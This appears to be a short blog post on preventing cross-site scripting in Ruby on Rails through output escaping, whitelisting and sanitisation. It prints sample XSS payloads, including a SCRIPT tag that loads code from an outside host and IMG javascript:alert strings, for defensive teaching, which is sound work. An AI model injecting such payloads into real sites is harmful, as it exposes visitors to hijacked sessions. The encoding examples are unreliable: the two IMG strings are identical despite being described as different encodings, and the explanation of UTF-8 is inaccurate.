Archive for the ‘xss’ tag
Secure coding with Ruby on Rails 4: Cross-site scripting (XSS)
A Failure to Preserve Web Page Structure, which is number four of the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors, is a programming error which makes an application vulnerable to cross-site scripting (XSS). For XSS an attacker injects malicious content into the output of a web application loading code from an external resource which is executed by the client’s web browser.
For example an attacker writes the following piece of code in a forum post. This line loads malicious JavaScript code from an external host which is executed when ever somebody reads the forum post.
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
While in order to prevent SQL injection it is important to sanitize the input data, for XSS especially the output of a web application should be sanitized. In order to achieve this, dynamic content could be displayed as followed.
escapeHTML(<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>)
The output escaper of ERB html_escape() has an alias called h() which makes it easier to use. For those this is still too much overhead or who want to be sure should use the Rails plugin SafeERB which ensures that all strings in a rhtml template are escaped properly.
When using a HTML output escaper it is important to verify that it is using a whitelist, since XSS attacks do not necessarily look like the example above. It can also have the form of the following strings which are hard to filter with a blacklist. The first attack string uses the IMG tag to insert the malicious JavaScript code which is encoded in UTF-8. Older browsers like IE6, IE7, and Firefox2 which are-for several reasons-still in use, are known to support such encodings and treat them as valid HTML code.
<IMG SRC=javascript:alert('XSS')>
This example can also be written the following way, which does not even use the semicolons at the end of an UTF-8 character encoding, since an UTF-8 character is encoded in 7 digits. The syntax with the semicolon is only a short form.
<IMG SRC=javascript:alert('XSS')>
For these and more cross-site scripting attack examples visit the XSS cheat sheet.
Although not direct measures against XSS, input sanitation and input validation can help to prevent malicious code from getting into the application. So the usage of sanitize() and Ruby on Rails validation methods is highly recommended to provide an in-depth defense strategy against cross-site scripting. A really useful plugin is acts_as_sanitized which provides XSS input sanitation.
Popularity: 2% [?]
